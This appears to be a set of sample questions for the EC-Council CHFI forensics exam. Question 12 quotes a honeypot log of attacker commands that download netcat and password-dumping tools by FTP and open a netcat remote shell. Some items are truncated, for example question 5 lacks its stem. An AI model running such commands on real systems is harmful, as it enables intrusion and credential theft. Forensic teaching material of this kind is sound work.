Sample questions for the EC-Council 312-49v9 Computer Hacking Forensic Investigator (V9) exam.
NEW QUESTION 1
What is the first step taken in an investigation for laboratory forensic staff members?
- A. Packaging the electronic evidence
- B. Securing and evaluating the electronic crime scene
- C. Conducting preliminary interviews
- D. Transporting the electronic evidence
NEW QUESTION 2
Jason is the security administrator of ACMA metal Corporation. One day he notices the company's Oracle database server has been compromised and the customer information along with financial data has been stolen. The financial loss will be in millions of dollars if the database gets into the hands of the competitors. Jason wants to report this crime to the law enforcement agencies immediately. Which organization coordinates computer crimes investigations throughout the United States?
- A. Internet Fraud Complaint Center
- B. Local or national office of the U.
- C. Secret Service
- D. National Infrastructure Protection Center
- E. CERT Coordination Center
NEW QUESTION 3
Davidson Trucking is a small transportation company that has three local offices in Detroit, Michigan. Ten female employees who work for the company have gone to an attorney reporting that male employees repeatedly harassed them and that management did nothing to stop the problem. Davidson has employee policies that outline all company guidelines, including awareness on harassment and how it will not be tolerated. When the case is brought to court, whom should the prosecuting attorney call upon for not upholding company policy?
- A. IT personnel
- B. Employees themselves
- C. Supervisors
- D. Administrative assistant in charge of writing policies
NEW QUESTION 4
Which of the following commands shows you the names of all open shared files on a server and number of file locks on each file?
- A. Net sessions
- B. Net file
- C. Netconfig
- D. Net share
NEW QUESTION 5
- A. a utility by AccessData
- B. a standard MS-DOS command
- C. Digital Intelligence utility
- D. dd copying tool
Explanation: diskcopy is a STANDARD DOS utility. C:\WINDOWS>diskcopy /? Copies the contents of one floppy disk to another.
NEW QUESTION 6
Graphics Interchange Format (GIF) is a ____ RGB bitmap image format for images with up to 256 distinct colors per frame.
- A. 8-bit
- B. 16-bit
- C. 24-bit
- D. 32-bit
NEW QUESTION 7
An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome.
- A. True
- B. False
NEW QUESTION 8
If an attacker's computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?
- A. 31402
- B. The zombie will not send a response
- C. 31401
- D. 31399
NEW QUESTION 9
Shortcuts are files with the extension .lnk that are created and accessed by users. These files provide you with information about:
- A. Files or network shares
- B. Running application
- C. Application logs
- D. System logs
NEW QUESTION 10
Harold is a security analyst who has just run the rdisk /s command to grab the backup SAM file on a computer. Where should Harold navigate on the computer to find the file?
- A. %systemroot%\LSA
- B. %systemroot%\system32\drivers\etc
- C. %systemroot%\repair
- D. %systemroot%\system32\LSA
NEW QUESTION 11
Tyler is setting up a wireless network for his business that he runs out of his home. He has followed all the directions from the ISP as well as the wireless router manual. He does not have any encryption set and the SSID is being broadcast. On his laptop, he can pick up the wireless signal for short periods of time, but then the connection drops and the signal goes away. Eventually the wireless signal shows back up, but drops intermittently. What could be Tyler's issue with his home wireless network?
- A. CB radio
- B. 2.4Ghz Cordless phones
- C. Satellite television
- D. Computers on his wired network
NEW QUESTION 12
The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 188.8.131.52. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.
He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes an RDS query which results in the commands run as shown below.
"cmd1.exe /c open 184.108.40.206 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
What can you infer from the exploit given?
- A. It is a local exploit where the attacker logs in using username johna2k
- B. There are two attackers on the system – johna2k and haxedj00
- C. The attack is a remote exploit and the hacker downloads three files
- D. The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port
Explanation: The log clearly indicates that this is a remote exploit with three files being downloaded and hence the correct answer is C.
NEW QUESTION 13
What is considered a grant of a property right given to an individual who discovers or invents a new machine, process, useful composition of matter or manufacture?
- A. Copyright
- B. Design patent
- C. Trademark
- D. Utility patent
NEW QUESTION 14
When examining a hard disk without a write-blocker, you should not start Windows because Windows will write data to the:
- A. Recycle Bin
- B. MSDOS.sys
- C. BIOS
- D. Case files
NEW QUESTION 15
Jason has set up a honeypot environment by creating a DMZ that has no physical or logical access to his production network. In this honeypot, he has placed a server running Windows Active Directory. He has also placed a Web server in the DMZ that services a number of web pages that offer visitors a chance to download sensitive information by clicking on a button. A week later, Jason finds in his network logs how an intruder accessed the honeypot and downloaded sensitive information. Jason uses the logs to try and prosecute the intruder for stealing sensitive corporate information. Why will this not be viable?
- A. Enticement
- B. Entrapment
- C. Intruding into a honeypot is not illegal
- D. Intruding into a DMZ is not illegal
NEW QUESTION 16
The task list command displays a list of applications and services with their Process ID (PID) for all tasks running on either a local or a remote computer.
Which of the following task list commands provides information about the listed processes, including the image name, PID, name, and number of the session for the process?
- A. tasklist/s
- B. tasklist/u
- C. tasklist/p
- D. tasklist/V